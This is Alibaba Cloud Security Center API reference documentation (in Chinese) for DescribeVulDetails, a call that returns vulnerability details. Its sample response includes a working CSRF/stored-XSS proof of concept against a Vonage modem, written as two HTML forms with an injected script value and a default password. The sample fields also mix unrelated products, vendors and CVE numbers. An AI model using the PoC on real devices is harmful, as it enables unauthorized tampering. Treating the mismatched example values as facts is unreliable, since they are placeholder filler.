首页 云安全中心 API参考指南 API目录 漏洞修复 DescribeVulDetails - 查询漏洞详情

DescribeVulDetails - 查询漏洞详情

查询漏洞详情。

调试

您可以在OpenAPI Explorer中直接运行该接口,免去您计算签名的困扰。运行成功后,OpenAPI Explorer可以自动生成SDK代码示例。

调试

授权信息

下表是API对应的授权信息,可以在RAM权限策略语句的Action元素中使用,用来给RAM用户或RAM角色授予调用此API的权限。具体说明如下:

  • 操作:是指具体的权限点。
  • 访问级别:是指每个操作的访问级别,取值为写入(Write)、读取(Read)或列出(List)。
  • 资源类型:是指操作中支持授权的资源类型。具体说明如下:
    • 对于必选的资源类型,用背景高亮的方式表示。
    • 对于不支持资源级授权的操作,用全部资源表示。
  • 条件关键字:是指云产品自身定义的条件关键字。
  • 关联操作:是指成功执行操作所需要的其他权限。操作者必须同时具备关联操作的权限,操作才能成功。
操作访问级别资源类型条件关键字关联操作
yundun-sas:DescribeVulDetailsRead
  • SecurityCenter
    acs:yundun-sas:*:{#accountId}:*

请求参数

名称类型必填描述示例值
Langstring

设置请求和接收消息的语言类型,取值:

  • zh:中文
  • en:英文
zh
Typestring

要查询的漏洞类型。取值:

  • cve:Linux漏洞
  • sys:Windows漏洞
  • cms:Web-CMS漏洞
  • app:应用漏洞
  • emg:应急漏洞
  • sca:软件成分分析漏洞
sca
Namestring

调用接口返回信息中的漏洞名称。

SCA:ACSV-2020-052801
AliasNamestring

漏洞简介的名称。

RHSA-2019:3197-Important: sudo security update

返回参数

名称类型描述示例值
object

请求返回参数。

RequestIdstring

本次调用请求的ID,是由阿里云为该请求生成的唯一标识符,可用于排查和定位问题。

EDA40EA3-6265-5900-AD99-C83E4F109CA8
Cvesarray

漏洞详情列表。

object

漏洞详情。

Summarystring

漏洞的简介。

Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.
Complexitystring

漏洞被利用的难度。取值:

  • LOW:低
  • MEDIUM:中
  • HIGH:高
LOW
Productstring

受漏洞影响的产品。

Log4j2
PocCreateTimelong

POC创建的时间戳,单位为毫秒。

1554189334000
CveIdstring

CVE编号。

CVE-2019-9167
CnvdIdstring

CNVD(中国国家漏洞数据库)编号。

CNVD-2019-9167
Referencestring

该漏洞在阿里云漏洞库中的参考链接。

https://example.com
CvssScorestring

该漏洞在阿里云漏洞库中的CVSS评分。

10.0
Vendorstring

漏洞发布的厂商。

Apache
PocDisclosureTimelong

POC暴露的时间戳,单位为毫秒。

1554189334000
Classifystring

漏洞的分类。

remote_code_execution
CvssVectorstring

CVSS评分向量。

AV:N/AC:L/Au:N/C:C/I:C/A:C
VulLevelstring

漏洞的严重等级。取值:

  • serious:严重
  • high:高
  • medium:中
  • low:低
serious
ReleaseTimelong

该漏洞在阿里云漏洞库中展示的漏洞披露时间戳,单位为毫秒。

1554189334000
Titlestring

漏洞公告的标题。

Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)
Solutionstring

漏洞的修复建议。

<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br />1) Update the latest product patch.↵<br />2) Install anti-virus software and update the virus database in time.↵<br />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>
Contentstring

CVE的内容。

Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability Check whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.
Pocstring

POC的内容。

NewDomain.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="" / > <input type="hidden" name="KeywordAction" value="0" /> <input type="hidden" name="NewDomain" value="test'><script>alert(1)</script>" /> <input type="hidden" name="x" value="50" /> <input type="hidden" name="y" value="15" /> <input type="hidden" name="DomainAction" value="1" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Exploit" /> </form> </html> NewKeyword.html The x and y values will need to be changed accordingly <html> <p>Authenticated Stored CSRF/XSS - Vonage Modem</p> <form method="POST" action="http://192.168.15.1/goform/RgParentalBasic"> <input type="hidden" name="RemoveContentRule" value="0" /> <input type="hidden" name="AddContentRule" value="0" /> <input type="hidden" name="ContentRules" value="0" /> <input type="hidden" name="RuleSelect" value="0" / > <input type="hidden" name="NewKeyword" value="test'><script>alert(1)</script>" / > <input type="hidden" name="x" value="61" /> <input type="hidden" name="y" value="12" /> <input type="hidden" name="KeywordAction" value="1" /> <input type="hidden" name="NewDomain" value="" /> <input type="hidden" name="DomainAction" value="0" /> <input type="hidden" name="AllowedDomainAction" value="0" /> <input type="hidden" name="ParentalPassword" value="Broadcom" /> <input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" /> <input type="hidden" name="AccessDuration" value="30" /> <input type="submit" title="Enable Service" /> </form> </html>
Classifysarray

漏洞分类列表。

object

漏洞分类详情。

Descriptionstring

漏洞的分类说明。

远程代码执行
Classifystring

漏洞的分类。

remote_code_execution
DemoVideoUrlstring

漏洞的演示视频地址。

https://example.com
InstanceNamestring

服务器实例的名称。

sql-test-001
InternetIpstring

服务器的公网IP地址。

47.114.XX.XX
IntranetIpstring

服务器的私网IP地址。

172.19.XX.XX
TargetIdstring

扫描对象ID。

m-bp17m0pc0xprzbwo****
TargetNamestring

扫描对象名称。

frontend

示例

正常返回示例

JSON格式

{
  "RequestId": "EDA40EA3-6265-5900-AD99-C83E4F109CA8",
  "Cves": [
    {
      "Summary": "Chanjet T-Plus is an Internet business management software. There is an unauthorized access vulnerability in one of its interfaces disclosed on the Internet. Attackers can construct malicious requests to upload malicious files to execute arbitrary code and control the server.",
      "Complexity": "LOW",
      "Product": "Log4j2",
      "PocCreateTime": 1554189334000,
      "CveId": "CVE-2019-9167",
      "CnvdId": "CNVD-2019-9167",
      "Reference": "https://example.com",
      "CvssScore": "10.0",
      "Vendor": "Apache",
      "PocDisclosureTime": 1554189334000,
      "Classify": "remote_code_execution",
      "CvssVector": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
      "VulLevel": "serious",
      "ReleaseTime": 1554189334000,
      "Title": "Chanjet T-Plus SetupAccount/Upload. Aspx file upload vulnerability(CNVD-2022-60632)",
      "Solution": "<p>At present, Chanjet has urgently released a vulnerability patch to fix the vulnerability. CNVD recommends affected units and users to upgrade to the latest version immediately:</p>↵<p>https://www.chanjetvip.com/product/goods/goods-detail?id=53aaa40295d458e44f5d3ce5</p>↵<p>At the same time, organizations and users affected by the vulnerability are requested to immediately follow the steps below to conduct self-inspection and repair work:</p>↵<ol>↵<li><p>User self-check steps:↵<br  />Check whether website/bin/load.aspx.cdcab7d2.compiled, website/bin/App_Web_load.aspx.cdcab7d2.dll, and tplus/Load.aspx files exist locally. If they exist, it means that they have been poisoned, and you must reinstall the system and install the product. patch.</p>↵</li>↵<li><p>Non-poisoned users please:↵<br  />1) Update the latest product patch.↵<br  />2) Install anti-virus software and update the virus database in time.↵<br  />3) Upgrade the lower version of IIS and Nginx to IIS10.0 and Windows 2016.↵<br  />4) Local installation customers need to confirm whether the backup file is complete as soon as possible, and do off-site backup. Customers on the cloud should enable the mirroring function in time.↵<br  />5) Users who fail to update the patch in time can contact Chanjet technical support and take temporary preventive measures such as deleting files.</p>↵</li>↵<li><p>Poisoned users please:↵<br  />1) Check whether the server has taken regular snapshots or backups. If so, you can restore data through snapshots or backups.↵<br  />2) Contact Chanjet technical support to confirm whether it has the conditions and operation methods to restore data from backup files.</p>↵</li>↵</ol>↵<p>If you have any technical problems, please contact Chanjet technical support: 4006600566-9</p>",
      "Content": "Apache Shiro is a user authentication and authorization framework for a wide range of rights management applications.↵Recently, Apache Shiro released version 1.7.0, which fixes the Apache Shiro authentication bypass vulnerability (CVE-2020-17510).↵Attackers can bypass Shiro's authentication using malicious requests containing payloads.↵↵Related bugs:↵CVE-2020-17510 Shiro < 1.7.0 Validation Bypass Vulnerability↵CVE-2020-13933 Shiro < 1.6.0 Validation Bypass Vulnerability↵CVE-2020-11989 Shiro < 1.5.3 Validation Bypass Vulnerability↵CVE-2020-1957 Shiro < 1.5.2 Validation Bypass Vulnerability↵CVE-2016-6802 Shiro < 1.3.2 Validation Bypass Vulnerability\nCheck whether the fastjson version currently running on the system is in the affected version and whether safeMode is configured to disable autoType. If it is in the affected version and safeMode is not configured to disable autoType, the vulnerability is considered to exist.",
      "Poc": "NewDomain.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"\" / >\n<input type=\"hidden\" name=\"KeywordAction\" value=\"0\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"test'><script>alert(1)</script>\" />\n<input type=\"hidden\" name=\"x\" value=\"50\" />\n<input type=\"hidden\" name=\"y\" value=\"15\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"1\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Exploit\" />\n</form>\n</html>\n \nNewKeyword.html\nThe x and y values will need to be changed accordingly\n<html>\n<p>Authenticated Stored CSRF/XSS - Vonage Modem</p>\n<form method=\"POST\" action=\"http://192.168.15.1/goform/RgParentalBasic\">\n<input type=\"hidden\" name=\"RemoveContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"AddContentRule\" value=\"0\" />\n<input type=\"hidden\" name=\"ContentRules\" value=\"0\" />\n<input type=\"hidden\" name=\"RuleSelect\" value=\"0\" / >\n<input type=\"hidden\" name=\"NewKeyword\" value=\"test'><script>alert(1)</script>\" / >\n<input type=\"hidden\" name=\"x\" value=\"61\" />\n<input type=\"hidden\" name=\"y\" value=\"12\" />\n<input type=\"hidden\" name=\"KeywordAction\" value=\"1\" />\n<input type=\"hidden\" name=\"NewDomain\" value=\"\" />\n<input type=\"hidden\" name=\"DomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"AllowedDomainAction\" value=\"0\" />\n<input type=\"hidden\" name=\"ParentalPassword\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"ParentalPasswordReEnter\" value=\"Broadcom\" />\n<input type=\"hidden\" name=\"AccessDuration\" value=\"30\" />\n<input type=\"submit\" title=\"Enable Service\" />\n</form>\n</html>",
      "Classifys": [
        {
          "Description": "远程代码执行",
          "Classify": "remote_code_execution",
          "DemoVideoUrl": "https://example.com"
        }
      ],
      "InstanceName": "sql-test-001",
      "InternetIp": "47.114.XX.XX",
      "IntranetIp": "172.19.XX.XX",
      "TargetId": "m-bp17m0pc0xprzbwo****",
      "TargetName": "frontend"
    }
  ]
}

错误码

HTTP status code错误码错误信息描述
400InnerErrorInnerError内部错误
400DataExists%s data exist数据已存在
403NoPermissioncaller has no permission当前操作未被授权,请联系主账号在RAM控制台进行授权后再执行操作。
500ServerErrorServerError服务故障

访问错误中心查看更多错误码。

阿里云首页 云安全中心(态势感知) 相关技术圈